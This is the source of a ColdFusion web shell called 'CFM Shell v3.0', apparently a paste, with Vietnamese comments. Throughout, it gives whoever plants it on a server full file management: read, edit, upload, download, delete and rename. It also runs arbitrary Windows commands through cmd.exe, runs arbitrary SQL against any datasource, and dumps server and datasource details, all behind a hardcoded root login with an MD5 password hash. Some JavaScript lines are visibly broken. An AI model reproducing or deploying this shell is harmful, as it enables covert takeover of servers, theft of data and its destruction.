

Jan 21st, 2018
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  1. <html>
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  24. <TITLE>CFM SHELL V3.0 edition</TITLE>
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  27. <body>
  28. <center>
  29. Cfm Shell v3.0 edition
  30. </center>
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  33. function doMenu(item)
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  47. <!--- Login --->
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  53. <cfif IsDefined("cookie.username")>
  54. <!--- Main --->
  55. <center>Username:<font color="#FFFF33"><b><cfoutput>#username#</cfoutput></b></font> !</center>
  56. <center><b><a href="?logout">Logout</a></b></center>
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  62. </cfif>
  63. <!--- Ham get Datasource Infor
  64. <cfscript>
  65. factory = CreateObject("java", "coldfusion.server.ServiceFactory");
  66. DataSoureceInfo = factory.DataSourceService.getDatasources();
  67. </cfscript> --->
  69. <!--- Ham doc tep --->
  70. <cffunction name="ReadFile" access="remote" output="true" returntype="any">
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  73. <cfoutput>#line#</cfoutput>
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  75. <!--- ham xoa thu muc --->
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  96. <!--- ham doi ten thu muc --->
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  100. <cfdirectory action="rename" directory="#arguments.oldDir#" newdirectory="#arguments.newDir#"/>
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  103. <!--- bat dau nhan lenh --->
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  118. <cfset file_name=#Replace(#scr#,'#GetDirectoryFromPath(scr)#','','ALL')#>
  119. <title>&##272;ang s&##7917;a t&##7879;p #scr#</title>
  120. <script language="JavaScript" type="text/javascript">
  121. function sTrim(sVariable)
  122. {
  123. return sVariable.replace(/^\s+|\s+$/g,"");
  124. }
  125. function validateFields(form)
  126. {
  127. return true;
  128. }
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  130. <cffile action="read" file="#scr#" variable="thisFile">
  131. <h1>Edit file:</h1>
  132. <div class=content>
  133. <form action="?action=save&scr=#GetDirectoryFromPath(scr)#" method="post" onsubmit="return validateFields(this);">
  134. <input type="hidden" name="fileName" value="#file_name#" />
  135. <input type="hidden" name="action_type" value="edit" />
  136. <tr>
  137. <td style="font-weight:bold;" nowrap="nowrap">
  138. File path:
  139. </td>
  140. <td>
  141. #scr#
  142. </td>
  143. </tr>
  144. <tr>
  145. <td>
  146. <cfset thisFile=#Replace(#thisFile#,'<','<','ALL')#>
  147. <cfset thisFile=#Replace(#thisFile#,'>','>','ALL')#>
  148. <textarea class="bigarea" name="fileContent">#thisFile#</textarea>
  149. </td>
  150. </tr>
  151. <tr>
  152. <td>
  153. <input type="submit" value="Save" style="font-family:verdana; font-size:11px;" />
  154. </td>
  155. </tr>
  156. </form></div>
  157. <cfelse>
  158. <p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
  159. </cfif>
  160. <a href="?action=goto&scr=#GetDirectoryFromPath(scr)#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  161. <cfelse>
  162. <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  163. </cfif>
  164. </cfoutput>
  165. <cfelseif action is "cut">
  166. <cfoutput>
  167. <cfif isDefined("scr")>
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  169. <cfif FileExists("#scr#")>
  170. <cfset cutdir = #RemoveChars(cutdir, len(cutdir), 1)#>
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  172. <cfset cutdir = #RemoveChars(cutdir, len(cutdir), 1)#>
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  178. <cffile action="move" source="#scr#" destination="#thumucsechuyen#">
  179. <cflocation url="?action=goto&scr=#cutdir#" addtoken="No">
  180. </cfif>
  181. <cfelse>
  182. <p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
  183. </cfif>
  184. <a href="?action=goto&scr=#cutdir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  185. <cfelse>
  186. <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  187. </cfif>
  188. </cfoutput>
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  190. <cfoutput>
  191. <cfif isDefined("scr")>
  192. <cfset copydir = #scr#>
  193. <cfif FileExists("#scr#")>
  194. <cfset copydir = #RemoveChars(copydir, len(copydir), 1)#>
  195. <cfloop condition = "Right(copydir, 1) neq '\'">
  196. <cfset copydir = #RemoveChars(copydir, len(copydir), 1)#>
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  198. <cfform name="articles" ENCTYPE="multipart/form-data">
  199. B&##7841;n s&##7869; sao ch&##233;p t&##7879;p <font color="red">#scr#</font> t&##7899;i <cfinput type="text" name="thumucsechuyen" size="50" value="#copydir#"> <input type="submit" value="Th&##7921;c hi&##7879;n" />
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  203. <cflocation url="?action=goto&scr=#copydir#" addtoken="No">
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  205. <cfelse>
  206. <p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
  207. </cfif>
  208. <a href="?action=goto&scr=#copydir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  209. <cfelse>
  210. <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  211. </cfif>
  212. </cfoutput>
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  214. <cfoutput>
  215. <cfif isDefined("scr")>
  216. <cfset renamedir = #scr#>
  217. <cfif FileExists("#scr#")>
  218. <cfloop condition = "Right(renamedir, 1) neq '\'">
  219. <cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#>
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  221. <cfform name="articles" ENCTYPE="multipart/form-data">
  222. Rename #renamedir#<cfinput type="text" name="namechange" size="25" value=""> <input type="submit" value="Rename" />
  223. </cfform>
  224. <cfif isDefined("namechange")>
  225. <cffile action="rename" source="#scr#" destination="#renamedir##namechange#">
  226. <cflocation url="?action=goto&scr=#renamedir#" addtoken="No">
  227. </cfif>
  228. <cfelse>
  229. <p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
  230. </cfif>
  231. <a href="?action=goto&scr=#renamedir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  232. <cfelse>
  233. <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  234. </cfif>
  235. </cfoutput>
  236. <cfelseif action is "renamed">
  237. <cfoutput>
  238. <cfif isDefined("scr")>
  239. <cfset renamedir = #scr#>
  240. <cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#>
  241. <cfif DirectoryExists("#scr#")>
  242. <cfloop condition = "Right(renamedir, 1) neq '\'">
  243. <cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#>
  244. </cfloop>
  245. <cfform name="articles" ENCTYPE="multipart/form-data">
  246. Rename #renamedir#<cfinput type="text" name="namechange" size="25" value=""> <input type="submit" value="Rename" />
  247. </cfform>
  248. <cfif isDefined("namechange")>
  249. #renameDirectory('#scr#','#renamedir##namechange#')#
  250. <cflocation url="?action=goto&scr=#renamedir#" addtoken="No">
  251. </cfif>
  252. <cfelse>
  253. <p>Th&##432; m&##7909;c #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
  254. </cfif>
  255. <a href="?action=goto&scr=#renamedir#" style="color: rgb(255, 0, 0);"><u> <- ..</u></a>
  256. <cfelse>
  257. <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- ..</u></a>
  258. </cfif>
  259. </cfoutput>
  260. <cfelseif action is "down">
  261. <cfoutput>
  262. <cfif isDefined("scr")>
  263. <cfset downdir = #scr#>
  264. <cfif FileExists("#scr#")>
  265. <cfloop condition = "Right(downdir, 1) neq '\'">
  266. <cfset downdir = #RemoveChars(downdir, len(downdir), 1)#>
  267. </cfloop>
  268. <cfheader name="Content-Disposition" value="attachment; filename=#getFileFromPath (scr)#">
  269. <cfcontent file="#scr#" type="application/octet-stream">
  270. <cfelse>
  271. <p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
  272. </cfif>
  273. <a href="?action=goto&scr=#downdir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  274. <cfelse>
  275. <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  276. </cfif>
  277. </cfoutput>
  278. <cfelseif action is "del">
  279. <cfoutput>
  280. <cfif isDefined("scr")>
  281. <cfset deletedir = #scr#>
  282. <cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
  283. <cfif FileExists("#scr#")>
  284. <cfloop condition = "Right(deletedir, 1) neq '\'">
  285. <cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
  286. </cfloop>
  287. <cffile action="delete" file="#scr#">
  288. <cflocation url="?action=goto&scr=#deletedir#" addtoken="No">
  289. <cfelse>
  290. <p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
  291. </cfif>
  292. <a href="?action=goto&scr=#deletedir#" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
  293. <cfelse>
  294. <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
  295. </cfif>
  296. </cfoutput>
  297. <cfelseif action is "deld">
  298. <cfoutput>
  299. <cfif isDefined("scr")>
  300. <cfset deletedir = #scr#>
  301. <cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
  302. <cfif DirectoryExists("#scr#")>
  303. <cfloop condition = "Right(deletedir, 1) neq '\'">
  304. <cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
  305. </cfloop>
  306. <cfset dirDelete('#scr#')>
  307. <cflocation url="?action=goto&scr=#deletedir#" addtoken="No">
  308. <cfelse>
  309. <p>DeleteDir</p>
  310. </cfif>
  311. <a href="?action=goto&scr=#deletedir#" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
  312. <cfelse>
  313. <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
  314. </cfif>
  315. </cfoutput>
  316. <cfelseif action is "new">
  317. <!---
  318. <cfoutput>
  319. <cfif isDefined("scr")>
  320. <cfif FileExists("#scr#")>
  321. <p>T&##7853;p tin #scr# &##273;&##227; t&##7891;n t&##7841;i.</p>
  322. <cfelse>
  323. <cfform name="articles" ENCTYPE="multipart/form-data">
  324. B&##7841;n s&##7869; t&##7841;o th&##432; m&##7909;c m&##7899;i #scr#<cfinput type="text" name="namecreate" size="25" value=""> <input type="submit" value="Th&##7921;c hi&##7879;n" />
  325. </cfform>
  326. <cfif isDefined("namecreate")>
  327. <cffile action = "write" file = "#scr##namecreate#" output = "">
  328. <cflocation url="?action=goto&scr=#scr#" addtoken="No">
  329. </cfif>
  330. </cfif>
  331. <a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  332. <cfelse>
  333. <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  334. </cfif>
  335. </cfoutput>
  336. --->
  337. <cfoutput>
  338. <cfif isDefined("scr")>
  339. <cfdirectory action="list" directory="#scr#" name="fileList">
  340. <script language="JavaScript" type="text/javascript">
  341. var fileArray = new Array(<cfoutput>#quotedValueList(</cfoutput>);
  342. function sTrim(sVariable)
  343. {
  344. return sVariable.replace(/^\s+|\s+$/g,"");
  345. }
  346. function validateFields(form)
  347. {
  348. var fileCount = 0;
  349. var re = /.txt$|.cfm$|.cfml$|.htm|.html$/;
  350. if (sTrim(form.fileName.value) == "")
  351. {
  352. alert('Can nhap ten tep');
  353. form.fileName.focus();
  354. return false;
  355. }
  356. if ( < 0)
  357. {
  358. alert('Khong chap nhan tep loai nay!\n\n Chi chap nhan .cfm, .cfml, .htm, .html, va .txt!');
  359. form.fileName.focus();
  361. return false;
  362. }
  363. for (var i=0; i<fileArray.length; i++)
  364. {
  365. if (sTrim(form.fileName.value) == fileArray[i])
  366. {
  367. fileCount++;
  368. }
  369. }
  370. if (fileCount > 0)
  371. {
  372. alert('Ten nay da ton tai, vui long chon tep khac');
  373. form.fileName.focus();
  375. return false;
  376. }
  377. return true;
  378. }
  379. </script>
  380. <form action="?action=save&scr=#scr#" method="post" onsubmit="return validateFields(this);">
  381. <input type="hidden" name="action_type" value="add" />
  382. <table border="0" style="width:400px;">
  383. <tr>
  384. <td style="font-weight:bold;" nowrap="nowrap">
  385. File name:
  386. </td>
  387. <td>
  388. <input type="text" name="fileName" style="font-family:verdana; font-size:11px; width:316px;" />
  389. </td>
  390. </tr>
  391. <tr>
  392. <td style="font-weight:bold;" nowrap="nowrap">
  393. File content:
  394. </td>
  395. <td colspan="2">
  396. <textarea name="fileContent" style="font-family:verdana; font-size:11px; height:250px; width:600px;"></textarea>
  397. </td>
  398. </tr>
  399. <tr>
  400. <td colspan="2" style="text-align:right;">
  401. <input type="submit" value="Save" style="font-family:verdana; font-size:11px;" />
  402. </td>
  403. </tr>
  404. </table>
  405. </form>
  406. <a href="?action=goto&scr=#GetDirectoryFromPath(scr)#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  407. <cfelse>
  408. <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  409. </cfif>
  410. </cfoutput>
  411. <cfelseif action is "newd">
  412. <cfoutput>
  413. <cfif isDefined("scr")>
  414. <cfform name="articles" ENCTYPE="multipart/form-data">
  415. New dir: <cfinput type="text" name="namecreate" size="25" value="#GetDirectoryFromPath(scr)#"> <input type="submit" value="Create new dir" />
  416. </cfform>
  417. <cfif isDefined("namecreate")>
  418. <cfdirectory directory= "#scr##namecreate#" action="create">
  419. <cflocation url="?action=goto&scr=#scr#" addtoken="No">
  420. </cfif>
  421. <a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  422. <cfelse>
  423. <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  424. </cfif>
  425. </cfoutput>
  426. <cfelseif action is "upload">
  427. <cfoutput>
  428. <cfif isDefined("scr")>
  429. <cfform enctype="multipart/form-data" method="post">
  430. Upload file to path: <font color="red">#scr#</font><br>
  431. Choose file: <input type="file" size="80" name="fileup" /> <input type="submit" value="Upload" /><br/>
  432. </cfform>
  433. <cfif isDefined("fileup")>
  434. <cffile action="upload" fileField="fileup" destination="#scr#" nameconflict="overwrite">
  435. <cflocation url="?action=goto&scr=#scr#" addtoken="No">
  436. </cfif>
  437. <a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  438. <cfelse>
  439. <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  440. </cfif>
  441. </cfoutput>
  442. <cfelseif action is "cmd">
  443. <cfoutput>
  444. <cfif not isDefined("patch")>
  445. <cfif FileExists("#GetDirectoryFromPath(GetTemplatePath())#cdm.exe")>
  446. <cfset patch = "#GetDirectoryFromPath(GetTemplatePath())#cmd.exe">
  447. <cfset out = "#GetDirectoryFromPath(GetTemplatePath())#out.txt">
  448. <cfelseif FileExists("C:\windows\system32\cmd.exe")>
  449. <cfset patch = "C:\windows\system32\cmd.exe">
  450. <cfset out = "C:\windows\system32\out.txt">
  451. <cfelseif FileExists("C:\winnp\system32\cmd.exe")>
  452. <cfset patch = "C:\winnp\system32\cmd.exe">
  453. <cfset out = "C:\winnp\system32\out.txt">
  454. <cfelse>
  455. <p>Kh&##244;ng t&##236;m th&##7845;y t&##7879;p cmd.exe</p>
  456. <p>Khai b&##225;o bi&##7871;n patch l&##224; &##273;&##432;&##7901;ng d&##7851;n tr&##7921;c ti&##7871;p t&##7899;i t&##7879;p cmd.exe</p>
  457. <p>Khai b&##225;o bi&##7871;n out l&##224; &##273;&##432;&##7901;ng d&##7851;n tr&##7921;c ti&##7871;p t&##7899;i t&##7879;p d&##7919; li&##7879;u</p>
  458. <cfset sai = 1>
  459. </cfif>
  460. <cfelseif FileExists("#patch#")>
  461. <cfset out = "#GetDirectoryFromPath(patch)#out.txt">
  462. <cfelse>
  463. <p>Kh&##244;ng t&##236;m th&##7845;y t&##7879;p cmd.exe</p>
  464. </cfif>
  465. <cfif not isDefined("sai")>
  466. <cfform name="articles" ENCTYPE="multipart/form-data">
  467. Enter command: <cfinput type="text" name="command" size="25" value=""> <input type="submit" value="Run" />
  468. </cfform>
  469. <cfif isDefined("command")>
  470. <p>Results:</p>
  471. <cfexecute name="#patch#" arguments="/C #command# > #out#" timeout="60"></cfexecute>
  472. #ReadFile('#out#')#
  473. #out#
  474. <cfif FileExists("#out#")>
  475. <cffile action="delete" file="#out#">
  476. </cfif>
  477. </cfif>
  478. </cfif>
  479. <br>
  480. <a href="?action=goto&scr=#GetDirectoryFromPath(GetTemplatePath())#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  481. </cfoutput>
  482. <cfelseif action is "datainfo">
  483. <cfoutput>
  484. <cfdump var="#DataSoureceInfo#">
  485. <a href="?action=goto&scr=#GetDirectoryFromPath(GetTemplatePath())#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  486. </cfoutput>
  487. <cfelseif action is "save">
  488. <cfoutput>
  489. <cfif isDefined("form.fileName")>
  490. <title>&##272;&##227; l&##432;u t&##7879;p</title>
  491. <cffile action="write" file="#scr#\#form.fileName#" output="#form.fileContent#" addnewline="no">
  492. &##272;&##227; <cfif form.action_type IS "edit">s&##7917;a<cfelse>t&##7841;o</cfif> th&##224;nh c&##244;ng t&##7879;p <span style="font-weight:bold;">#form.fileName#</span>.<br>
  493. <a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  494. <cfelse>
  495. <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  496. </cfif>
  497. </cfoutput>
  498. <cfelseif action is "sql">
  499. <cfoutput>
  500. <cfform name="articles1" ENCTYPE="multipart/form-data">
  501. DataBase Name:
  502. <cfif isDefined("database")>
  503. <cfinput type="text" name="database" size="25" value="#database#"><br>
  504. <cfelseif IsDefined("DS")>
  505. <cfinput type="text" name="database" size="25" value="#DS#"><br>
  506. <cfelse>
  507. <cfinput type="text" name="database" size="25" value=""><br>
  508. </cfif>
  509. SQL query: <cfinput type="text" query="SQL" name="query" size="130" value=""><br>
  510. <input type="submit" value="Th&##7921;c hi&##7879;n" />
  511. </cfform>
  512. </cfoutput>
  513. <cfif isDefined("database") and isDefined("query")>
  514. <cfquery name="SQL" DataSource="#database#">
  515. #preserveSingleQuotes(query)#
  516. </cfquery>
  517. <br>
  518. <table width="90%" border="1" align="center">
  519. <tr><td align="center">M?u h?i: <font color="red"><cfoutput>#query#</cfoutput></font></td></tr>
  520. <tr><td align="center">K?t qu? tr? v?:</td></tr>
  521. <tr><td><cfdump var="#SQL#" format="text" label="Ket qua"></td></tr>
  522. </table>
  523. <br>
  524. </cfif>
  525. <cfoutput>
  526. <a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
  527. </cfoutput>
  528. </cfif>
  529. <cfelse>
  530. <cfset action = "goto">
  531. </cfif>
  532. <cfif action is "goto" or action is "del" or action is "deld">
  533. <cfoutput>
  534. <center><a href="javascript:doMenu('thongtin');" id=xthongtin>[-]</a>Server info:</center>
  535. <div id="thongtin">
  536. <!--- Lay thong tin ip --->
  537. <cfif #cgi.http_x_forwarded_for# eq "">
  538. <cfset clientip="#cgi.remote_addr#">
  539. <cfelse>
  540. <cfset clientip="#cgi.http_x_forwarded_for#">
  541. </cfif>
  542. <!--- In thong tin server --->
  543. <span>Server IP:</span> #CGI.HTTP_HOST#:#CGI.SERVER_PORT#</span> - <span>Client IP:</span> #clientip#<br>
  544. <span>Gateway Interface:</span> #CGI.GATEWAY_INTERFACE# - <span>Server Name:</span> #CGI.SERVER_NAME#:#CGI.SERVER_PORT#<br>
  545. <span>Server Protocol:</span> #CGI.SERVER_PROTOCOL# - <span>Server Software:</span> #CGI.SERVER_SOFTWARE#<br>
  546. <span>Appserver:</span> #server.coldfusion.appserver# - <span>Expiration:</span> #DateFormat(server.coldfusion.expiration, "d/m/yy")# #TimeFormat(server.coldfusion.expiration, "HH:mm:ss")#<br>
  547. <span>Product Name:</span> #server.coldfusion.productname# - <span>Product Level:</span> #server.coldfusion.productlevel# - <span>Product Version:</span> #server.coldfusion.productversion#<br>
  548. <span>Server OS Arch:</span> #server.os.arch# - <span>Server OS Name:</span> - <span>Server OS Version:</span> #server.os.version#<br>
  549. </div>
  550. <hr>
  551. <!--- Thu tao Object
  552. <cftry>
  553. <cfobject type="com" class="scripting.filesystemobject" name="fso" action="connect">
  554. <cfcatch type="any">
  555. <cfobject type="com" class="scripting.filesystemobject" name="fso" action="create">
  556. </cfcatch>
  557. </cftry>
  558. --->
  560. <hr>
  561. <center><a href="javascript:doMenu('congcu');" id=xcongcu>[-]</a>Main:</center>
  562. <div id="congcu">
  563. Path: #dir#<br>
  564. Operations: <a href="?action=new&scr=#dir#">NewFile</a> - <a href="?action=newd&scr=#dir#">NewDir</a> - <a href="?action=upload&scr=#dir#" title="T&##7843;i l&##234;n m&##7897;t t&##7879;p t&##7915; m&##225;y t&##237;nh c&##7911;a b&##7841;n">Upload file</a> - <a href="?" title="Tr&##7903; v&##7873; th&##432; m&##7909;c ch&##7913;a Shell">---</a><br>
  565. Actions: <a href="?action=cmd" title="Th&##7921;c thi l&##7879;nh Command Dos">CMD</a> - <a href="?action=sql&scr=#dir#" title="Th&##7921;c thi l&##7879;nh SQL query">SQL</a> - <a href="?action=datainfo" title="Th&##244;ng tin C&##417; S&##7903; D&##7919; Li&##7879;u">Datainfo CSDL</a>
  566. </div>
  567. <hr>
  568. <h1>File manager:</h1>
  569. <div id="thumuc">
  570. </cfoutput>
  571. <cfdirectory directory="#dir#" name="myDirectory" sort="type ASC" >
  572. <div class=content>
  573. <table width=100% class=main cellspacing=0 cellpadding=1><tr><th width='13px'><input type=checkbox class=chkbx name=ch11'></th><th>Name</th><th>Size</th><th>Modify</th><th>Chmod</th><th>Mode</th><th>Actions</th></tr>
  574. <cfoutput>
  575. <cfif len(dir) gt 3>
  576. <tr>
  577. <cfset updir = #dir#>
  578. <cfset updir = #RemoveChars(updir, len(updir), 1)#>
  579. <cfloop condition = "Right(updir, 1) neq '\'">
  580. <cfset updir = #RemoveChars(updir, len(updir), 1)#>
  581. </cfloop>
  582. <th class=chkbx><input type=checkbox width='13px' class=chkbx></th><td width="20%"><strong><a href="?action=goto&scr=#updir#">..</a></strong></td>
  583. </tr>
  584. </cfif>
  585. </cfoutput>
  586. <cfset x=1>
  587. <cfoutput query="myDirectory">
  588. <cfif x EQ 2>
  589. <tr class=l2><th class=chkbx width='13px'><input type=checkbox class=chkbx></th>
  590. </cfif>
  591. <cfif x EQ 1>
  592. <tr class=l1><th class=chkbx width='13px'><input type=checkbox class=chkbx></th>
  593. </cfif>
  594. <cfif x EQ 1>
  595. <cfset x=2>
  596. <cfelse>
  597. <cfset x=1>
  598. </cfif>
  599. <td>
  600. <cfif #Type# is "Dir">
  601. <a href="?action=goto&scr=#dir##Name#\"><b>[#Name#]</b></a>
  602. <cfelse>
  603. <a href="?action=edit&scr=#dir##Name#\">#Name#</a>
  604. </cfif>
  605. </td>
  606. <td>
  607. <cfif #type# is "Dir">
  608. <Dir>
  609. <cfelseif #Size# LT 1024>
  610. #Size# B
  611. <cfelseif #Size# LT 1024*1024>
  612. #round(Size/1024)# KB
  613. <cfelseif #Size# LT 1024*1024*1024>
  614. #round(Size/1024/1024)# MB
  615. <cfelseif #Size# LT 1024*1024*1024*1024>
  616. #round(Size/1024/1024/1024)# GB
  617. <cfelseif #Size# LT 1024*1024*1024*1024*1024>
  618. #round(Size/1024/1024/1024/1024)# TB
  619. </cfif>
  620. </td>
  621. <td>
  622. #DateFormat(DateLastModified, "d/m/yy")# #TimeFormat(DateLastModified, "HH:mm:ss")#
  623. </td>
  624. <td>#Attributes#</td>
  625. <td>#Mode#</td>
  626. <td>
  627. <cfif #Type# is "File">
  628. <a href="?action=edit&scr=#dir##Name#">Edit</a>|<a href="?action=cut&scr=#dir##Name#">Cut</a>|<a href="?action=copy&scr=#dir##Name#">Copy</a>|<a href="?action=rename&scr=#dir##Name#">Rename</a>|<a href="?action=down&scr=#dir##Name#">Download</a>|<a href="?action=del&scr=#dir##Name#" onCLick="return confirm('Delete #Name# ?')">Delete</a>
  629. <cfelse>
  630. <a href="?action=cutd&scr=#dir##Name#\">Cutdir</a>|<a href="?action=copyd&scr=#dir##Name#\">Copy</a>|<a href="?action=renamed&scr=#dir##Name#\">Rename</a>|<a href="?action=deld&scr=#dir##Name#\" onCLick="return confirm('Delete #Name# ?')">DeleteDir</a>
  631. </cfif>
  632. </td>
  633. </tr>
  634. </cfoutput>
  635. </table></div>
  636. </div>
  637. </cfif>
  638. <!--- End Main --->
  639. <cfelseif Not IsDefined("cookie.username")>
  640. <cfform name="articles" ENCTYPE="multipart/form-data">
  641. <center><table width="300" border="0">
  642. <tr>
  643. <td width="50">Username:</td>
  644. <td width="50"><input type="text" name="username"></td>
  645. </tr>
  646. <tr>
  647. <td width="50">Password:</td>
  648. <td width="50"><input type="password" name="password"></td>
  649. </tr>
  650. <tr>
  651. <td width="50">Remember you?:</td>
  652. <td width="50">
  653. <input type="checkbox" name="RememberMe" value="Yes" checked>
  654. <input type="submit" name="Process" value="Login">
  655. </td>
  656. </tr>
  657. </table></center>
  658. </cfform>
  659. <cfif IsDefined("username")>
  660. <cfset member_username = "root">
  661. <cfset member_password = "a619d974658f3e749b2d88b215baea46">
  662. <cfif #username# neq #member_username#>
  663. <center>Wrong username!</center>
  664. <cfset structclear(cookie)>
  665. <cfelseif hash(form.password, "MD5") neq #member_password#>
  666. <center>Wrong password!</center>
  667. <cfset structclear(cookie)>
  668. <cfelse>
  669. <cfif IsDefined("RememberMe")>
  670. <cfset member_password1 = hash(form.password, "MD5")>
  671. <cfcookie name="username" value="#form.username#" expires="NEVER">
  672. <cfcookie name="password" value="#member_password1#" expires="NEVER">
  673. <cfelse>
  674. <cfset member_password1 = hash(form.password, "MD5")>
  675. <cfcookie name="username" value="#form.username#">
  676. <cfcookie name="password" value="#member_password1#">
  677. </cfif>
  678. <cflocation url="?" addtoken="No">
  679. </cfif>
  680. </cfif>
  681. </cfif>
  682. <!--- End Login --->
  683. <hr>
  684. </body>
  685. </html>
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